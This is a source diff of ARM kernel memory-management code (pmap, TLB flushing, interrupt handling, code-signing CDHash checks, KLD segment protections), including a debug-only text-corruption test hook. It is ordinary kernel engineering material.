-                                       pmap_tte_deallocate(pmap, tte_p, pt_attr_twig_level(pt_attr));
+                                       pmap_tte_deallocate(pmap, cur, cur + PAGE_SIZE, false, tte_p, pt_attr_twig_level(pt_attr));
                                } else {
                                        /* Just remove for the parent map. */
-                                       pmap_tte_remove(pmap, tte_p, pt_attr_twig_level(pt_attr));
+                                       pmap_tte_remove(pmap, cur, cur + PAGE_SIZE, false, tte_p, pt_attr_twig_level(pt_attr));
                                }
-
-                               pmap_get_pt_ops(pmap)->flush_tlb_tte_async(cur, pmap);
-                               modified = true;
                        }
                }
 
@@ -10984,10 +11368,6 @@ done:
                pmap_unlock(pmap);
        }
 
-       if (modified) {
-               sync_tlb_flush();
-       }
-
 #if (__ARM_VMSA__ > 7)
        /* Remove empty L2 TTs. */
        adjusted_start = ((start + pt_attr_ln_offmask(pt_attr, PMAP_TT_L1_LEVEL)) & ~pt_attr_ln_offmask(pt_attr, PMAP_TT_L1_LEVEL));
@@ -11030,8 +11410,7 @@ done:
                }
 
                if (remove_tt1e) {
-                       pmap_tte_deallocate(pmap, tt1e_p, PMAP_TT_L1_LEVEL);
-                       PMAP_UPDATE_TLBS(pmap, cur, cur + PAGE_SIZE, false);
+                       pmap_tte_deallocate(pmap, cur, cur + PAGE_SIZE, false, tt1e_p, PMAP_TT_L1_LEVEL);
                }
 
                pmap_unlock(pmap);
@@ -11229,7 +11608,7 @@ static void *
 pmap_sign_user_ptr_internal(void *value, ptrauth_key key, uint64_t discriminator, uint64_t jop_key)
 {
        void *res = NULL;
-       boolean_t current_intr_state = ml_set_interrupts_enabled(FALSE);
+       uint64_t current_intr_state = pmap_interrupts_disable();
 
        uint64_t saved_jop_state = ml_enable_user_jop_key(jop_key);
        switch (key) {
@@ -11244,7 +11623,7 @@ pmap_sign_user_ptr_internal(void *value, ptrauth_key key, uint64_t discriminator
        }
        ml_disable_user_jop_key(jop_key, saved_jop_state);
 
-       ml_set_interrupts_enabled(current_intr_state);
+       pmap_interrupts_restore(current_intr_state);
 
        return res;
 }
@@ -11263,13 +11642,13 @@ pmap_auth_user_ptr_internal(void *value, ptrauth_key key, uint64_t discriminator
        }
 
        void *res = NULL;
-       boolean_t current_intr_state = ml_set_interrupts_enabled(FALSE);
+       uint64_t current_intr_state = pmap_interrupts_disable();
 
        uint64_t saved_jop_state = ml_enable_user_jop_key(jop_key);
        res = ml_auth_ptr_unchecked(value, key, discriminator);
        ml_disable_user_jop_key(jop_key, saved_jop_state);
 
-       ml_set_interrupts_enabled(current_intr_state);
+       pmap_interrupts_restore(current_intr_state);
 
        return res;
 }
@@ -11974,19 +12353,6 @@ flush_mmu_tlb_region_asid_async(
 #endif
 }
 
-MARK_AS_PMAP_TEXT static void
-flush_mmu_tlb_tte_asid_async(vm_offset_t va, pmap_t pmap)
-{
-#if     (__ARM_VMSA__ == 7)
-       flush_mmu_tlb_entry_async((va & ~ARM_TT_L1_PT_OFFMASK) | (pmap->hw_asid & 0xff));
-       flush_mmu_tlb_entry_async(((va & ~ARM_TT_L1_PT_OFFMASK) + ARM_TT_L1_SIZE) | (pmap->hw_asid & 0xff));
-       flush_mmu_tlb_entry_async(((va & ~ARM_TT_L1_PT_OFFMASK) + 2 * ARM_TT_L1_SIZE) | (pmap->hw_asid & 0xff));
-       flush_mmu_tlb_entry_async(((va & ~ARM_TT_L1_PT_OFFMASK) + 3 * ARM_TT_L1_SIZE) | (pmap->hw_asid & 0xff));
-#else
-       flush_mmu_tlb_entry_async(tlbi_addr(va & ~pt_attr_twig_offmask(pmap_get_pt_attr(pmap))) | tlbi_asid(pmap->hw_asid));
-#endif
-}
-
 MARK_AS_PMAP_TEXT static void
 flush_mmu_tlb_full_asid_async(pmap_t pmap)
 {
@@ -13177,7 +13543,7 @@ pmap_ppl_lockdown_page(vm_address_t kva)
 
        UNLOCK_PVH(pai);
 
-       pmap_page_protect_options_internal((ppnum_t)atop(pa), VM_PROT_READ, 0);
+       pmap_page_protect_options_internal((ppnum_t)atop(pa), VM_PROT_READ, 0, NULL);
 }
 
 /*
@@ -13400,15 +13766,15 @@ pmap_advise_pagezero_range(__unused pmap_t p, __unused uint64_t a)
 
 #define PMAP_PGTRACE_LOCK(p)                                \
     do {                                                    \
-       *(p) = ml_set_interrupts_enabled(false);            \
+       *(p) = pmap_interrupts_disable();            \
        if (simple_lock_try(&(pmap_pgtrace.lock), LCK_GRP_NULL)) break;   \
-       ml_set_interrupts_enabled(*(p));                    \
+       pmap_interrupts_restore(*(p));                    \
     } while (true)
 
 #define PMAP_PGTRACE_UNLOCK(p)                  \
     do {                                        \
        simple_unlock(&(pmap_pgtrace.lock));    \
-       ml_set_interrupts_enabled(*(p));        \
+       pmap_interrupts_restore(*(p));        \
     } while (0)
 
 #define PGTRACE_WRITE_PTE(pte_p, pte_entry) \
@@ -13502,7 +13868,7 @@ pmap_pgtrace_find_page(pmap_paddr_t pa)
 static bool
 pmap_pgtrace_enter_clone(pmap_t pmap, vm_map_offset_t va_page, vm_map_offset_t start, vm_map_offset_t end)
 {
-       bool ints;
+       uint64_t ints;
        queue_head_t *q = &(pmap_pgtrace.pages);
        pmap_paddr_t pa_page;
        pt_entry_t *ptep, *cptep;
@@ -13631,7 +13997,7 @@ pmap_pgtrace_enter_clone(pmap_t pmap, vm_map_offset_t va_page, vm_map_offset_t s
 static void
 pmap_pgtrace_remove_clone(pmap_t pmap, pmap_paddr_t pa, vm_map_offset_t va)
 {
-       bool ints, found = false;
+       uint64_t ints, found = false;
        pmap_pgtrace_page_t *p;
        pt_entry_t *ptep;
 
@@ -13691,7 +14057,7 @@ unlock_exit:
 static void
 pmap_pgtrace_remove_all_clone(pmap_paddr_t pa)
 {
-       bool ints;
+       uint64_t ints;
        pmap_pgtrace_page_t *p;
        pt_entry_t *ptep;
 
@@ -14027,7 +14393,7 @@ pmap_pgtrace_add_page(pmap_t pmap, vm_map_offset_t start, vm_map_offset_t end)
        int ret = 0;
        pt_entry_t *ptep;
        queue_head_t *q = &(pmap_pgtrace.pages);
-       bool ints;
+       uint64_t ints;
        vm_map_offset_t cur_page, end_page;
 
        if (start > end) {
@@ -14182,7 +14548,7 @@ int
 pmap_pgtrace_delete_page(pmap_t pmap, vm_map_offset_t start, vm_map_offset_t end)
 {
        int ret = 0;
-       bool ints;
+       uint64_t ints;
        queue_head_t *q = &(pmap_pgtrace.pages);
        pmap_pgtrace_page_t *p;
        vm_map_offset_t cur_page, end_page;
@@ -14250,7 +14616,7 @@ pmap_pgtrace_fault(pmap_t pmap, vm_map_offset_t va, arm_saved_state_t *ss)
        pt_entry_t *ptep;
        pgtrace_run_result_t res;
        pmap_pgtrace_page_t *p;
-       bool ints, found = false;
+       uint64_t ints, found = false;
        pmap_paddr_t pa;
 
        // Quick check if we are interested
@@ -14703,6 +15069,53 @@ pmap_lookup_in_static_trust_cache(const uint8_t cdhash[CS_CDHASH_LEN])
 #endif
 }
 
+MARK_AS_PMAP_TEXT static void
+pmap_set_compilation_service_cdhash_internal(const uint8_t cdhash[CS_CDHASH_LEN])
+{
+       pmap_simple_lock(&pmap_compilation_service_cdhash_lock);
+       memcpy(pmap_compilation_service_cdhash, cdhash, CS_CDHASH_LEN);
+       pmap_simple_unlock(&pmap_compilation_service_cdhash_lock);
+
+       pmap_cs_log("Added Compilation Service CDHash through the PPL: 0x%02X 0x%02X 0x%02X 0x%02X", cdhash[0], cdhash[1], cdhash[2], cdhash[4]);
+}
+
+MARK_AS_PMAP_TEXT static bool
+pmap_match_compilation_service_cdhash_internal(const uint8_t cdhash[CS_CDHASH_LEN])
+{
+       bool match = false;
+
+       pmap_simple_lock(&pmap_compilation_service_cdhash_lock);
+       if (bcmp(pmap_compilation_service_cdhash, cdhash, CS_CDHASH_LEN) == 0) {
+               match = true;
+       }
+       pmap_simple_unlock(&pmap_compilation_service_cdhash_lock);
+
+       if (match) {
+               pmap_cs_log("Matched Compilation Service CDHash through the PPL");
+       }
+
+       return match;
+}
+
+void
+pmap_set_compilation_service_cdhash(const uint8_t cdhash[CS_CDHASH_LEN])
+{
+#if XNU_MONITOR
+       pmap_set_compilation_service_cdhash_ppl(cdhash);
+#else
+       pmap_set_compilation_service_cdhash_internal(cdhash);
+#endif
+}
+
+bool
+pmap_match_compilation_service_cdhash(const uint8_t cdhash[CS_CDHASH_LEN])
+{
+#if XNU_MONITOR
+       return pmap_match_compilation_service_cdhash_ppl(cdhash);
+#else
+       return pmap_match_compilation_service_cdhash_internal(cdhash);
+#endif
+}
 
 MARK_AS_PMAP_TEXT static void
 pmap_footprint_suspend_internal(
@@ -14869,7 +15282,7 @@ pmap_test_access(pmap_t pmap, vm_map_address_t va, bool should_fault, bool is_wr
         * disable interrupts and preemption to avoid any unexpected memory
         * accesses.
         */
-       boolean_t old_int_state = ml_set_interrupts_enabled(false);
+       uint64_t old_int_state = pmap_interrupts_disable();
        pmap_t old_pmap = current_pmap();
        mp_disable_preemption();
        pmap_switch(pmap);
@@ -14898,7 +15311,7 @@ pmap_test_access(pmap_t pmap, vm_map_address_t va, bool should_fault, bool is_wr
 
        pmap_switch(old_pmap);
        mp_enable_preemption();
-       ml_set_interrupts_enabled(old_int_state);
+       pmap_interrupts_restore(old_int_state);
        bool retval = (took_fault == should_fault);
        return retval;
 }
@@ -15233,3 +15646,76 @@ pmap_test(void)
        return KERN_SUCCESS;
 }
 #endif /* CONFIG_XNUPOST */
+
+/*
+ * The following function should never make it to RELEASE code, since
+ * it provides a way to get the PPL to modify text pages.
+ */
+#if DEVELOPMENT || DEBUG
+
+#define ARM_UNDEFINED_INSN 0xe7f000f0
+#define ARM_UNDEFINED_INSN_THUMB 0xde00
+
+/**
+ * Forcibly overwrite executable text with an illegal instruction.
+ *
+ * @note Only used for xnu unit testing.
+ *
+ * @param pa The physical address to corrupt.
+ *
+ * @return KERN_SUCCESS on success.
+ */
+kern_return_t
+pmap_test_text_corruption(pmap_paddr_t pa)
+{
+#if XNU_MONITOR
+       return pmap_test_text_corruption_ppl(pa);
+#else /* XNU_MONITOR */
+       return pmap_test_text_corruption_internal(pa);
+#endif /* XNU_MONITOR */
+}
+
+MARK_AS_PMAP_TEXT kern_return_t
+pmap_test_text_corruption_internal(pmap_paddr_t pa)
+{
+       vm_offset_t va = phystokv(pa);
+       unsigned int pai = pa_index(pa);
+
+       assert(pa_valid(pa));
+
+       LOCK_PVH(pai);
+
+       pv_entry_t **pv_h  = pai_to_pvh(pai);
+       assert(!pvh_test_type(pv_h, PVH_TYPE_NULL));
+#if defined(PVH_FLAG_EXEC)
+       const bool need_ap_twiddle = pvh_get_flags(pv_h) & PVH_FLAG_EXEC;
+
+       if (need_ap_twiddle) {
+               pmap_set_ptov_ap(pai, AP_RWNA, FALSE);
+       }
+#endif /* defined(PVH_FLAG_EXEC) */
+
+       /*
+        * The low bit in an instruction address indicates a THUMB instruction
+        */
+       if (va & 1) {
+               va &= ~(vm_offset_t)1;
+               *(uint16_t *)va = ARM_UNDEFINED_INSN_THUMB;
+       } else {
+               *(uint32_t *)va = ARM_UNDEFINED_INSN;
+       }
+
+#if defined(PVH_FLAG_EXEC)
+       if (need_ap_twiddle) {
+               pmap_set_ptov_ap(pai, AP_RONA, FALSE);
+       }
+#endif /* defined(PVH_FLAG_EXEC) */
+
+       InvalidatePoU_IcacheRegion(va, sizeof(uint32_t));
+
+       UNLOCK_PVH(pai);
+
+       return KERN_SUCCESS;
+}
+
+#endif /* DEVELOPMENT || DEBUG */
index 760592fd699dd4adc37316e1444d1877cdc26035..13c58aa156f0a0a3844380149832e61a9ea45375 100644 (file)
@@ -47,6 +47,7 @@
 #include <mach/kern_return.h>
 #include <mach/machine/vm_types.h>
 #include <arm/pmap_public.h>
+#include <kern/ast.h>
 #include <mach/arm/thread_status.h>
 #if defined(__arm64__)
 #include <arm64/tlb.h>
@@ -331,7 +332,7 @@ extern pmap_paddr_t mmu_uvtop(vm_offset_t va);
 #define PMAP_GC_WAIT            2
 
 #if DEVELOPMENT || DEBUG
-#define pmap_cs_log_h(msg, args...) { if(pmap_cs_log_hacks) printf("PMAP_CS: " msg "\n", args); }
+#define pmap_cs_log_h(msg, args...) { if(pmap_cs_log_hacks) printf("PMAP_CS: " msg "\n", ##args); }
 #define pmap_cs_log pmap_cs_log_h
 
 #else
@@ -461,7 +462,7 @@ extern  void pmap_gc(void);
 #if HAS_APPLE_PAC
 extern void * pmap_sign_user_ptr(void *value, ptrauth_key key, uint64_t data, uint64_t jop_key);
 extern void * pmap_auth_user_ptr(void *value, ptrauth_key key, uint64_t data, uint64_t jop_key);
-#endif /* HAS_APPLE_PAC && XNU_MONITOR */
+#endif /* HAS_APPLE_PAC */
 
 /*
  * Interfaces implemented as macros.
@@ -620,10 +621,10 @@ pmap_disable_user_jop(pmap_t pmap);
 #define PMAP_LEDGER_ALLOC_INDEX 58
 #define PMAP_LEDGER_FREE_INDEX 59
 
-#if HAS_APPLE_PAC && XNU_MONITOR
+#if HAS_APPLE_PAC
 #define PMAP_SIGN_USER_PTR 60
 #define PMAP_AUTH_USER_PTR 61
-#endif /* HAS_APPLE_PAC && XNU_MONITOR */
+#endif /* HAS_APPLE_PAC */
 
 #define PHYS_ATTRIBUTE_CLEAR_RANGE_INDEX 66
 
@@ -636,8 +637,15 @@ pmap_disable_user_jop(pmap_t pmap);
 
 #define PMAP_SET_VM_MAP_CS_ENFORCED_INDEX 72
 
+#define PMAP_SET_COMPILATION_SERVICE_CDHASH_INDEX   73
+#define PMAP_MATCH_COMPILATION_SERVICE_CDHASH_INDEX 74
+
 
-#define PMAP_COUNT 74
+#if DEVELOPMENT || DEBUG
+#define PMAP_TEST_TEXT_CORRUPTION_INDEX 76
+#endif /* DEVELOPMENT || DEBUG */
+
+#define PMAP_COUNT 77
 
 #define PMAP_INVALID_CPU_NUM (~0U)
 
@@ -651,6 +659,18 @@ extern void pmap_cpu_data_init(void);
 /* Get the pmap per-CPU data for the current CPU. */
 extern pmap_cpu_data_t * pmap_get_cpu_data(void);
 
+/*
+ * For most batched page operations, we pick a sane default page count
+ * interval at which to check for pending preemption and exit the PPL if found.
+ */
+#define PMAP_DEFAULT_PREEMPTION_CHECK_PAGE_INTERVAL 64
+
+inline bool
+pmap_pending_preemption(void)
+{
+       return !!(*((volatile ast_t*)ast_pending()) & AST_URGENT);
+}
+
 #if XNU_MONITOR
 extern boolean_t pmap_ppl_locked_down;
 
@@ -728,6 +748,10 @@ extern void CleanPoC_DcacheRegion_Force_nopreempt(vm_offset_t va, size_t length)
 #define pmap_unlock_bit(l, i)           hw_unlock_bit(l, i)
 #endif
 
+#if DEVELOPMENT || DEBUG
+extern kern_return_t pmap_test_text_corruption(pmap_paddr_t);
+#endif /* DEVELOPMENT || DEBUG */
+
 #endif /* #ifndef ASSEMBLER */
 
 #if __ARM_KERNEL_PROTECT__
index 0ebbf526bc9c96bb082c3f84d60000ab3f813752..522f7e1c0f12c34d25a260715f8508234c7fee5c 100644 (file)
 #define ARM_PTE_PNX            0x00000000             /* no privilege execute. not impl */
 #define ARM_PTE_PNX_MASK       (0<<ARM_PTE_NXSHIFT)
 
+#define ARM_PTE_XMASK          (ARM_PTE_PNX_MASK | ARM_PTE_NX_MASK)
+
 #define ARM_PTE_TEX0SHIFT      6
 #define ARM_PTE_TEX0           (1<<ARM_PTE_TEX0SHIFT)
 #define ARM_PTE_TEX0_MASK      (1<<ARM_PTE_TEX0SHIFT)
index 1787a3ce348ffe3c16a40747c3dcb725ecf46458..79b7986a507f353c5373fe4a9c476f3ee28e5b1e 100644 (file)
@@ -153,7 +153,10 @@ rtclock_init(void)
        cpu_data_t * cdp;
 
        clock_timebase_init();
-       ml_init_lock_timeout();
+
+       if (cpu_number() == master_cpu) {
+               ml_init_lock_timeout();
+       }
 
        cdp = getCpuDatap();
 
index 2c0ed7ebde2f7265221b1d82a7047333c413ce1b..8ea5feaa622b8a63db0213b444ed6934e50b6ec6 100644 (file)
 
 
 
+#define TASK_ADDITIONS_UEXC uint64_t uexc[4];
 
 #define MACHINE_TASK \
        void* task_debug; \
        TASK_ADDITIONS_PAC \
-
+\
+       TASK_ADDITIONS_UEXC
index aab4908ff4b4d5bb55184efb3aee47d075ecd525..da0e1280c4dc867daf48142f2523605ec440f0de 100644 (file)
@@ -27,6 +27,10 @@ INSTALL_KF_MD_LCL_LIST = \
        tlb.h \
        $(ARM_HEADER_FILES)
 
+# Headers installed into System.framework/PrivateHeaders
+INSTALL_MD_LCL_LIST = \
+       $(ARM_PRIVATE_HEADERS)
+
 # TODO: Is there a reason that machine_machdep.h is not in this list? If not, these lists can be consolidated.
 # Headers used to compile xnu
 EXPORT_MD_LIST = \
@@ -44,6 +48,8 @@ EXPORT_MD_LIST = \
 # These headers will be available with #include <arm64/header_file.h>
 EXPORT_MD_DIR = arm64
 
+INSTALL_MD_DIR = arm64
+
 else # $(PLATFORM),MacOSX
 
 
index fe0c6f80b307a686776fa4fb72e79171f8c61c51..0a7434b30af56dbcbd1dfd89abe828d55635ada2 100644 (file)
@@ -70,6 +70,7 @@ extern vm_offset_t   segTEXTEXECB;
 extern unsigned long segSizeLAST;
 extern unsigned long segSizeLASTDATACONST;
 extern unsigned long segSizeTEXTEXEC;
+extern unsigned long segSizeKLD;
 
 typedef struct lock_reg {
        uint32_t        reg_offset;                             // Register offset
@@ -113,12 +114,6 @@ static uint64_t lock_group_va[MAX_LOCK_GROUPS][MAX_APERTURES];
 SECURITY_READ_ONLY_LATE(bool) csr_unsafe_kernel_text = false;
 #endif
 
-#if defined(KERNEL_INTEGRITY_KTRR)
-#define CTRR_LOCK_MSR ARM64_REG_KTRR_LOCK_EL1
-#elif defined(KERNEL_INTEGRITY_CTRR)
-#define CTRR_LOCK_MSR ARM64_REG_CTRR_LOCK_EL1
-#endif
-
 /*
  * lock_group_t - describes all the parameters xnu needs to know to
  * lock down the AMCC/IOA (Lock Group) Read Only Region(s) on cold start.
@@ -411,7 +406,8 @@ rorgn_stash_range(void)
         * +------------------+-----------+-----------------------------------+
         * | Largest Address  |    LAST   | <- AMCC RO Region End (rorgn_end) |
         * +------------------+-----------+-----------------------------------+
-        * |                  | TEXT_EXEC | <- KTRR RO Region End (ctrr_end)  |
+        * |                  |    KLD    | <- KTRR RO Region End (ctrr_end)  |
+        * |                  | TEXT_EXEC |                                   |
         * +------------------+-----------+-----------------------------------+
         * |                  |    ...    |                                   |
         * +------------------+-----------+-----------------------------------+
@@ -430,7 +426,7 @@ rorgn_stash_range(void)
        assert(segSizeLAST == PAGE_SIZE);
 
        /* assert that segLAST is contiguous and just after/above/numerically higher than KTRR end */
-       assert((ctrr_end + 1) == kvtophys(segTEXTEXECB) + segSizeTEXTEXEC);
+       assert((ctrr_end + 1) == kvtophys(segTEXTEXECB) + segSizeTEXTEXEC + segSizeKLD);
 
        /* ensure that iboot and xnu agree on the amcc rorgn range */
        assert((rorgn_begin == ctrr_begin) && (rorgn_end == (ctrr_end + segSizeLASTDATACONST + segSizeLAST)));
@@ -443,6 +439,9 @@ rorgn_stash_range(void)
         * | Largest Address  |    LAST   |  <- CTRR/AMCC RO Region End  |
         * |                  |           |     (ctrr_end/rorgn_end)     |
         * +------------------+-----------+------------------------------+
+        * |                  | PPLDATA_CONST                            |
+        * |                  |  PPLTEXT  |                              |
+        * |                  |    KLD    |                              |
         * |                  | TEXT_EXEC |                              |
         * +------------------+-----------+------------------------------+
         * |                  |    ...    |                              |
@@ -468,49 +467,6 @@ rorgn_stash_range(void)
 #endif
 }
 
-#if DEVELOPMENT || DEBUG
-static void
-assert_all_lock_groups_unlocked(lock_group_t const *lock_groups)
-{
-       uint64_t reg_addr;
-       uint64_t ctrr_lock = 0;
-       bool locked = false;
-       bool write_disabled = false;;
-
-       assert(lock_groups);
-
-       for (unsigned int lg = 0; lg < MAX_LOCK_GROUPS; lg++) {
-               for (unsigned int aperture = 0; aperture < lock_groups[lg].aperture_count; aperture++) {
-#if HAS_IOA
-                       // Does the lock group define a master lock register?
-                       if (lock_groups[lg].master_lock_reg.reg_mask != 0) {
-                               reg_addr = lock_group_va[lg][aperture] + lock_groups[lg].master_lock_reg.reg_offset;
-                               locked |= ((*(volatile uint32_t *)reg_addr & lock_groups[lg].master_lock_reg.reg_mask) == lock_groups[lg].master_lock_reg.reg_value);
-                       }
-#endif
-                       for (unsigned int plane = 0; plane < lock_groups[lg].plane_count; plane++) {
-                               // Does the lock group define a write disable register?
-                               if (lock_groups[lg].ctrr_a.write_disable_reg.reg_mask != 0) {
-                                       reg_addr = lock_group_va[lg][aperture] + (plane * lock_groups[lg].plane_stride) + lock_groups[lg].ctrr_a.write_disable_reg.reg_offset;
-                                       write_disabled |= ((*(volatile uint32_t *)reg_addr & lock_groups[lg].ctrr_a.write_disable_reg.reg_mask) == lock_groups[lg].ctrr_a.write_disable_reg.reg_value);
-                               }
-
-                               // Does the lock group define a lock register?
-                               if (lock_groups[lg].ctrr_a.lock_reg.reg_mask != 0) {
-                                       reg_addr = lock_group_va[lg][aperture] + (plane * lock_groups[lg].plane_stride) + lock_groups[lg].ctrr_a.lock_reg.reg_offset;
-                                       locked |= ((*(volatile uint32_t *)reg_addr & lock_groups[lg].ctrr_a.lock_reg.reg_mask) == lock_groups[lg].ctrr_a.lock_reg.reg_value);
-                               }
-                       }
-               }
-       }
-
-       ctrr_lock = __builtin_arm_rsr64(CTRR_LOCK_MSR);
-
-       assert(!ctrr_lock);
-       assert(!write_disabled && !locked);
-}
-#endif
-
 static void
 lock_all_lock_groups(lock_group_t const *lock_group, vm_offset_t begin, vm_offset_t end)
 {
@@ -562,56 +518,6 @@ lock_all_lock_groups(lock_group_t const *lock_group, vm_offset_t begin, vm_offse
        }
 }
 
-static void
-lock_mmu(uint64_t begin, uint64_t end)
-{
-#if defined(KERNEL_INTEGRITY_KTRR)
-
-       __builtin_arm_wsr64(ARM64_REG_KTRR_LOWER_EL1, begin);
-       __builtin_arm_wsr64(ARM64_REG_KTRR_UPPER_EL1, end);
-       __builtin_arm_wsr64(ARM64_REG_KTRR_LOCK_EL1, 1ULL);
-
-       /* flush TLB */
-
-       __builtin_arm_isb(ISB_SY);
-       flush_mmu_tlb();
-
-#elif defined (KERNEL_INTEGRITY_CTRR)
-       /* this will lock the entire bootstrap cluster. non bootstrap clusters
-        * will be locked by respective cluster master in start.s */
-
-       __builtin_arm_wsr64(ARM64_REG_CTRR_A_LWR_EL1, begin);
-       __builtin_arm_wsr64(ARM64_REG_CTRR_A_UPR_EL1, end);
-
-#if !defined(APPLEVORTEX)
-       /* H12+ changed sequence, must invalidate TLB immediately after setting CTRR bounds */
-       __builtin_arm_isb(ISB_SY); /* ensure all prior MSRs are complete */
-       flush_mmu_tlb();
-#endif /* !defined(APPLEVORTEX) */
-
-       __builtin_arm_wsr64(ARM64_REG_CTRR_CTL_EL1, CTRR_CTL_EL1_A_PXN | CTRR_CTL_EL1_A_MMUON_WRPROTECT);
-       __builtin_arm_wsr64(ARM64_REG_CTRR_LOCK_EL1, 1ULL);
-
-       uint64_t current_el = __builtin_arm_rsr64("CurrentEL");
-       if (current_el == PSR64_MODE_EL2) {
-               // CTRR v2 has explicit registers for cluster config. they can only be written in EL2
-
-               __builtin_arm_wsr64(ACC_CTRR_A_LWR_EL2, begin);
-               __builtin_arm_wsr64(ACC_CTRR_A_UPR_EL2, end);
-               __builtin_arm_wsr64(ACC_CTRR_CTL_EL2, CTRR_CTL_EL1_A_PXN | CTRR_CTL_EL1_A_MMUON_WRPROTECT);
-               __builtin_arm_wsr64(ACC_CTRR_LOCK_EL2, 1ULL);
-       }
-
-       __builtin_arm_isb(ISB_SY); /* ensure all prior MSRs are complete */
-#if defined(APPLEVORTEX)
-       flush_mmu_tlb();
-#endif /* defined(APPLEVORTEX) */
-
-#else /* defined(KERNEL_INTEGRITY_KTRR) */
-#error KERNEL_INTEGRITY config error
-#endif /* defined(KERNEL_INTEGRITY_KTRR) */
-}
-
 #if DEVELOPMENT || DEBUG
 static void
 assert_amcc_cache_disabled(lock_group_t const *lock_group)
@@ -662,8 +568,6 @@ rorgn_lockdown(void)
                lock_group_t const * const lock_group = find_lock_group_data();
 
 #if DEVELOPMENT || DEBUG
-               assert_all_lock_groups_unlocked(lock_group);
-
                printf("RO Region Begin: %p End: %p\n", (void *)rorgn_begin, (void *)rorgn_end);
                printf("CTRR (MMU) Begin: %p End: %p, setting lockdown\n", (void *)ctrr_begin, (void *)ctrr_end);
 
@@ -673,14 +577,6 @@ rorgn_lockdown(void)
                // Lock the AMCC/IOA PIO lock registers.
                lock_all_lock_groups(lock_group, phystokv(rorgn_begin), phystokv(rorgn_end));
 
-               /*
-                * KTRR/CTRR registers are inclusive of the smallest page size granule supported by processor MMU
-                * rather than the actual page size in use. Load the last byte of the end page, and let the HW
-                * truncate per the smallest page granule supported. Must use same treament in start.s for warm
-                * start of APs.
-                */
-               lock_mmu(ctrr_begin, ctrr_end);
-
                // Unmap and free PIO VA space needed to lockdown the lock groups.
                for (unsigned int lg = 0; lg < MAX_LOCK_GROUPS; lg++) {
                        for (unsigned int aperture = 0; aperture < lock_group[lg].aperture_count; aperture++) {
index 10c0a455eb55ada3fd983b298975e379acf1beb7..728ee8c27bf31f60189373796dc9c9f16508114c 100644 (file)
@@ -258,7 +258,9 @@ SECURITY_READ_ONLY_LATE(vm_offset_t)          segLINKB;
 SECURITY_READ_ONLY_LATE(static unsigned long) segSizeLINK;
 
 SECURITY_READ_ONLY_LATE(static vm_offset_t)   segKLDB;
-SECURITY_READ_ONLY_LATE(static unsigned long) segSizeKLD;
+SECURITY_READ_ONLY_LATE(unsigned long)        segSizeKLD;
+SECURITY_READ_ONLY_LATE(static vm_offset_t)   segKLDDATAB;
+SECURITY_READ_ONLY_LATE(static unsigned long) segSizeKLDDATA;
 SECURITY_READ_ONLY_LATE(vm_offset_t)          segLASTB;
 SECURITY_READ_ONLY_LATE(unsigned long)        segSizeLAST;
 SECURITY_READ_ONLY_LATE(vm_offset_t)          segLASTDATACONSTB;
@@ -1338,6 +1340,7 @@ noAuxKC:
        arm_vm_page_granular_RNX((vm_offset_t)&excepstack_high_guard, PAGE_MAX_SIZE, 0);
 
        arm_vm_page_granular_ROX(segKLDB, segSizeKLD, ARM64_GRANULE_ALLOW_BLOCK | ARM64_GRANULE_ALLOW_HINT);
+       arm_vm_page_granular_RNX(segKLDDATAB, segSizeKLDDATA, ARM64_GRANULE_ALLOW_BLOCK | ARM64_GRANULE_ALLOW_HINT);
        arm_vm_page_granular_RWNX(segLINKB, segSizeLINK, ARM64_GRANULE_ALLOW_BLOCK | ARM64_GRANULE_ALLOW_HINT);
        arm_vm_page_granular_RWNX(segPLKLINKEDITB, segSizePLKLINKEDIT, ARM64_GRANULE_ALLOW_BLOCK | ARM64_GRANULE_ALLOW_HINT); // Coalesced kext LINKEDIT segment
        arm_vm_page_granular_ROX(segLASTB, segSizeLAST, ARM64_GRANULE_ALLOW_BLOCK); // __LAST may be empty, but we cannot assume this
@@ -1433,8 +1436,12 @@ arm_vm_physmap_init(boot_args *args)
        // Slid region between gPhysBase and beginning of protected text
        arm_vm_physmap_slide(temp_ptov_table, gVirtBase, segLOWEST - gVirtBase, AP_RWNA, 0);
 
-       // kext bootstrap segment
+       // kext bootstrap segments
+#if !defined(KERNEL_INTEGRITY_KTRR) && !defined(KERNEL_INTEGRITY_CTRR)
+       /* __KLD,__text is covered by the rorgn */
        arm_vm_physmap_slide(temp_ptov_table, segKLDB, segSizeKLD, AP_RONA, 0);
+#endif
+       arm_vm_physmap_slide(temp_ptov_table, segKLDDATAB, segSizeKLDDATA, AP_RONA, 0);
 
        // Early-boot data
        arm_vm_physmap_slide(temp_ptov_table, segBOOTDATAB, segSizeBOOTDATA, AP_RONA, 0);
@@ -1551,10 +1558,17 @@ arm_vm_prot_finalize(boot_args * args __unused)
 #endif /* __ARM_KERNEL_PROTECT__ */
 
 #if XNU_MONITOR
+#if !defined(KERNEL_INTEGRITY_KTRR) && !defined(KERNEL_INTEGRITY_CTRR)
+       /* __KLD,__text is covered by the rorgn */
        for (vm_offset_t va = segKLDB; va < (segKLDB + segSizeKLD); va += ARM_PGBYTES) {
                pt_entry_t *pte = arm_kva_to_pte(va);
                *pte = ARM_PTE_EMPTY;
        }
+#endif
+       for (vm_offset_t va = segKLDDATAB; va < (segKLDDATAB + segSizeKLDDATA); va += ARM_PGBYTES) {
+               pt_entry_t *pte = arm_kva_to_pte(va);
+               *pte = ARM_PTE_EMPTY;
+       }
        /* Clear the original stack mappings; these pages should be mapped through ptov_table. */
        for (vm_offset_t va = segBOOTDATAB; va < (segBOOTDATAB + segSizeBOOTDATA); va += ARM_PGBYTES) {
                pt_entry_t *pte = arm_kva_to_pte(va);
@@ -1589,6 +1603,11 @@ arm_vm_prot_finalize(boot_args * args __unused)
                arm_vm_page_granular_RNX(segLASTDATACONSTB, segSizeLASTDATACONST, ARM64_GRANULE_ALLOW_BLOCK);
        }
 
+       /*
+        * __KLD,__text should no longer be executable.
+        */
+       arm_vm_page_granular_RNX(segKLDB, segSizeKLD, ARM64_GRANULE_ALLOW_BLOCK);
+
        /*
         * Must wait until all other region permissions are set before locking down DATA_CONST
         * as the kernel static page tables live in DATA_CONST on KTRR enabled systems
@@ -1860,6 +1879,7 @@ arm_vm_init(uint64_t memory_size, boot_args * args)
        segBOOTDATAB     = (vm_offset_t) getsegdatafromheader(&_mh_execute_header, "__BOOTDATA", &segSizeBOOTDATA);
        segLINKB         = (vm_offset_t) getsegdatafromheader(&_mh_execute_header, "__LINKEDIT", &segSizeLINK);
        segKLDB          = (vm_offset_t) getsegdatafromheader(&_mh_execute_header, "__KLD", &segSizeKLD);
